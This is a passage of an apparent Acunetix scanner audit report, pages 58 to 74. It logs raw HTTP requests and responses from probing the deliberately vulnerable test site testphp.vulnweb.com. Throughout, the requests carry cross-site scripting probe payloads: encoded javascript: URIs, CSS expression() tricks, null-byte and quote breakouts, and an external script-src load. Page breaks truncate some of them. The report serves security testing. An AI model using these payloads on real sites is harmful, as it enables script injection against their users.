Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 125 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 158 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

58

Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=
Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 114 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 100 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28468345920991%29%3B%22%3E&submit=a dd%20message Response Acunetix Website Audit

59

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 121 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 72 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

60

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20m essage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(469855922094))%3E& submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

61

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 84 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(467985920807)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

62

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 95 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(468015920807)%3B&submit=add%20 message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 87 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=>'>alert(467995920807)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close Acunetix Website Audit

63

/guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 136 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=>'>alert(469085921556)%3B&submit=add%20mess age Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request Acunetix Website Audit

64

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 88 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469075921556)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 82 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

65

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=-->alert(469125921556)%3B&submit=add%20mes Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469105921556)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

66

Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=email@somealert(469135921556)%3Bdomain.com& submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 111 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28469155921556%29%3B%22% 3E&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

67

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=alert(469115921556)%3B&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text= &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

68

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 108 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 69 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 105 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

69

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&su Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 115 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text="+src="http://testphp.acunetix.com/xss.js?468655921150">&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%00"'>alert(468705921150)%3B&submit=add%20messa ge Response Acunetix Website Audit

70

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3C/xss/*-*/style=xss:e/**/xpression(alert(468985921283))%3E&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=

alert(468675921150)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

71

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%00'">alert(468695921150)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=%00"'>alert(481675929237)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=%00'">alert(481665929237)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

72

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/ Details Request GET /hpp/?pp=>">alert(481385929129)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:43:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=& pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=<%00script>alert(541875967426)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28541755967314%29%3B%22%3 E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

74

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=>">alert(541695967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541675967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) 